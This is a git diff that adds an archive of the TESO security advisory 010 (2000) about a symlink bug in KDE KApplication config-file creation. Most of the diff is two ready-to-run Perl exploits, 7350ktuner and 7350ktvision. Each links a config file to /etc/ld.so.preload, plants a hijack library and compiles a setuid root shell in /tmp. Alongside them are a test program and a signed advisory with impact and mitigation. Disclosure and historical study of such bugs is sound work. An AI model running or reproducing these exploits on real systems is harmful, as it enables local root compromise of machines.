initial

6 files changed, 364 insertions, 0 deletions

diff --git a/advisories/teso-advisory-010/7350ktuner b/advisories/teso-advisory-010/7350ktuner
new file mode 100755
index 0000000..9bcb360
--- /dev/null
+++ b/advisories/teso-advisory-010/7350ktuner
@@ -0,0 +1,86 @@
+#!/usr/bin/perl
+
+#
+# 7350ktuner! The ktuner-hack. 
+# (a.k.a. kil3r for some reason :)
+#
+# Just execute. Gives instant rootshell kiddie!
+# If only ktuner is setuid-root and vulnerable as with
+# SuSE 6.4!
+#
+# When has this stupid race an end?
+#
+# Bugdiscovery is due to Sebastian Krahmer.
+# http://www.cs.uni-potsdam.de/homepages/students/linuxer
+#
+#
+# Greets as always to TESO, security.is, lam3rz ... you all
+# know who you are.
+#
+# 
+
+my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";
+
+$ENV{"PATH"}.=":/opt/kde/bin";
+
+print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
+
+print "Creating hijack-lib ...\n";
+open O, ">/tmp/boom.c" or die "open(boom.c..)";
+print O<<_EOF_;
+#include <sys/types.h>
+
+int time(void *v)
+{
+        chown("/tmp/boomsh", 0, 0);
+        chmod("/tmp/boomsh", 06755);
+        unlink("/etc/ld.so.preload");
+        exit(1);
+}
+_EOF_
+close O;
+
+print "Compiling hijack-lib ...\n";
+`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
+`cc -shared /tmp/boom.o -o /tmp/boom.so`;
+
+open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
+print O<<_EOF2_;
+#include <stdio.h>
+int main() 
+{
+    char *a[] = {"/bin/sh", 0};
+    setuid(0); setregid(0, 0);
+    execve(a[0], a, 0);
+    return 0;
+}
+_EOF2_
+close O;
+
+print "Compile shell ...\n";
+`cc /tmp/boomsh.c -o /tmp/boomsh`;
+
+umask 0;
+
+unlink $rcfile;
+symlink "/etc/ld.so.preload", $rcfile;
+
+print "Invoking vulnerable program (ktuner)...\n";
+
+if (fork() == 0) {
+        `ktuner`;
+        exit 0;
+} else {
+        sleep(3);
+        kill 9, `pidof ktuner`;
+}
+
+open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
+print O "/tmp/boom.so";
+close O;
+`/usr/bin/passwd`;
+
+# let it look like if we have sth. to do. :)
+sleep 3;
+print "Welcome. But as always: BEHAVE!\n";
+system("/tmp/boomsh");
diff --git a/advisories/teso-advisory-010/7350ktvision b/advisories/teso-advisory-010/7350ktvision
new file mode 100755
index 0000000..2f8dbbd
--- /dev/null
+++ b/advisories/teso-advisory-010/7350ktvision
@@ -0,0 +1,85 @@
+#!/usr/bin/perl
+
+#
+# 7350ktvision! The ktvision-hack. 
+#
+# Just execute. Gives instant rootshell kiddie!
+# If only ktvision is setuid-root and vulnerable as with
+# SuSE 6.4!
+#
+#
+# Bugdiscovery is due to Sebastian Krahmer.
+# http://www.cs.uni-potsdam.de/homepages/students/linuxer
+#
+# Greets as always to TESO, security.is, lam3rz ... you all
+# know who you are.
+#
+# Special greets to that beautiful black-dressed woman at
+# the bus stop. This one is for you. :)
+# 
+
+my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";
+
+$ENV{"PATH"}.=":/opt/kde/bin";
+
+print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
+
+print "Creating hijack-lib ...\n";
+open O, ">/tmp/boom.c" or die "open(boom.c..)";
+print O<<_EOF_;
+#include <sys/types.h>
+
+int time(void *v)
+{
+        chown("/tmp/boomsh", 0, 0);
+        chmod("/tmp/boomsh", 06755);
+        unlink("/etc/ld.so.preload");
+        exit(1);
+}
+_EOF_
+close O;
+
+print "Compiling hijack-lib ...\n";
+`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
+`cc -shared /tmp/boom.o -o /tmp/boom.so`;
+
+open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
+print O<<_EOF2_;
+#include <stdio.h>
+int main() 
+{
+    char *a[] = {"/bin/sh", 0};
+    setuid(0); setregid(0, 0);
+    execve(a[0], a, 0);
+    return 0;
+}
+_EOF2_
+close O;
+
+print "Compile shell ...\n";
+`cc /tmp/boomsh.c -o /tmp/boomsh`;
+
+umask 0;
+
+unlink $rcfile;
+symlink "/etc/ld.so.preload", $rcfile;
+
+print "Invoking vulnerable program (ktvision)...\n";
+
+if (fork() == 0) {
+        `ktvision`;
+        exit 0;
+} else {
+        sleep(3);
+        kill 9, `pidof ktvision`;
+}
+
+open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
+print O "/tmp/boom.so";
+close O;
+`/usr/bin/passwd`;
+
+# let it look like if we have sth. to do. :)
+sleep 3;
+print "Welcome. But as always: BEHAVE!\n";
+system("/tmp/boomsh");
diff --git a/advisories/teso-advisory-010/Makefile b/advisories/teso-advisory-010/Makefile
new file mode 100644
index 0000000..bf3229f
--- /dev/null
+++ b/advisories/teso-advisory-010/Makefile
@@ -0,0 +1,3 @@
+all:
+        c++ a.out.cc -I/opt/kde/include -I/usr/lib/qt/include /opt/kde/lib/libkdecore.so -lqt
+        
\ No newline at end of file
diff --git a/advisories/teso-advisory-010/a.out.cc b/advisories/teso-advisory-010/a.out.cc
new file mode 100644
index 0000000..a4a9b53
--- /dev/null
+++ b/advisories/teso-advisory-010/a.out.cc
@@ -0,0 +1,14 @@
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <kapp.h>
+
+
+int main(int argc, char **argv)
+{
+      KApplication *base = new KApplication(argc, argv);
+
+      base->exec(); 
+      return 0;
+}
+ 
diff --git a/advisories/teso-advisory-010/kil3r b/advisories/teso-advisory-010/kil3r
new file mode 120000
index 0000000..ce4e021
--- /dev/null
+++ b/advisories/teso-advisory-010/kil3r
@@ -0,0 +1 @@
+7350ktuner
\ No newline at end of file
diff --git a/advisories/teso-advisory-010/teso-advisory-010.txt b/advisories/teso-advisory-010/teso-advisory-010.txt
new file mode 100644
index 0000000..46e3522
--- /dev/null
+++ b/advisories/teso-advisory-010/teso-advisory-010.txt
@@ -0,0 +1,175 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+
+- ------
+
+TESO Security Advisory
+2000/05/29
+
+KDE KApplication {} configfile vulnerability
+
+
+Summary
+===================
+
+    A bug within the KDE configuration-file management has been
+    discovered.
+    Due to insecure creation of configuration files via KApplication-class, 
+    local lusers can create arbitrary files when running setuid root 
+    KDE-programs.
+    This can result in a complete compromise of the system.
+
+
+Systems Affected
+===================
+
+    The vulnerability is at least present within KDE 1.1.2.
+    All tests were performed on a SuSE 6.4 standard installation.
+
+
+Tests
+===================
+
+        bash-2.03$ nl /tmp/a.out.cc
+             1  #include <string.h>
+             2  #include <stdlib.h>
+             3  #include <stdio.h>
+             4  #include <kapp.h>
+
+
+             5  int main(int argc, char **argv)
+             6  {
+             7        KApplication *base = new KApplication(argc, argv);
+
+             8        base->exec();
+             9        return 0;
+            10  }
+            11
+        bash-2.03$ ls -la /etc/foo
+        ls: /etc/foo: No such file or directory
+
+        bash-2.04$ ln -s /etc/foo ~/.kde/share/config/a.outrc
+        bash-2.03$ ls -la /tmp/a.out
+        -rwsr-sr-x   1 root     root        19450 May 28 14:14 /tmp/a.out
+        bash-2.03$ /tmp/a.out
+        ^C
+
+        bash-2.03$ ls -la /etc/foo
+        -rw-rw-rw-   1 stealth  500             0 May 28 14:26 /etc/foo
+        bash-2.03$
+
+    (Output formatted to improve readability).
+
+
+Impact
+===================
+
+    An attacker may gain local root-access to a system where vulnerable KDE
+    distributions are installed.
+    Due to the GUI-nature of KDE, it might become difficult for an attacker
+    to gain a root-shell on a remote system. However, the individual could 
+    modify the DISPLAY environment variable to redirect the output to one 
+    of his own machines.
+    A vulnerable system must have at least one setuser-id program
+    installed which utilizes the KApplication class.
+    Such programs include ktvision and ktuner, for an example.
+
+
+Explanation
+===================
+
+    Obviously, KDE doesn't check for possible symlinks when creating
+    configuration-files. This may result in arbitrary file-creation or 
+    chmod's of any file.
+    We assume the bug is within the KApplication::init() function:
+    
+    ...
+    
+    // now for the local app config file
+    QString aConfigName = KApplication::localkdedir();
+    aConfigName += "/share/config/";
+    aConfigName += aAppName;
+    aConfigName += "rc";
+
+    QFile aConfigFile( aConfigName );
+    ...
+
+
+    This instanciation probably creates the file. However we haven't checked
+    QFile {} further.           
+
+
+Solution
+===================
+
+    Neither run KDE applications setuid nor setgid.
+    The KDE developers have been informed. A patch should be made available 
+    soon. Upgrade as promptly as possible.
+
+
+Acknowledgments
+================
+
+    The bug-discovery and the demonstration programs are due to
+    Sebastian "Stealth" Krahmer [1].
+    Further checking on different distributions have been made
+    by Scut.
+
+    This advisory was written by Sebastian and Scut.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@coredump.cx.
+    Our web page is at http://teso.scene.at/
+    
+    Stealth may be reached through [1].
+
+
+References
+===================
+
+    [1] http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+    [2] TESO
+        http://teso.scene.at or https://teso.scene.at/
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information about the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    links [1] and [2].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+
+    The exploit is available from
+
+       http://teso.scene.at/ or https://teso.scene.at/
+
+    and
+
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+
+- ------
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.0 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE5MWgLcZZ+BjKdwjcRAqJfAJwM5ksv/2dm7liESPMlYkQevZcfiACfb45I
+0Xp/9kMRr1FTMV6r0qh+lao=
+=6q3d
+-----END PGP SIGNATURE-----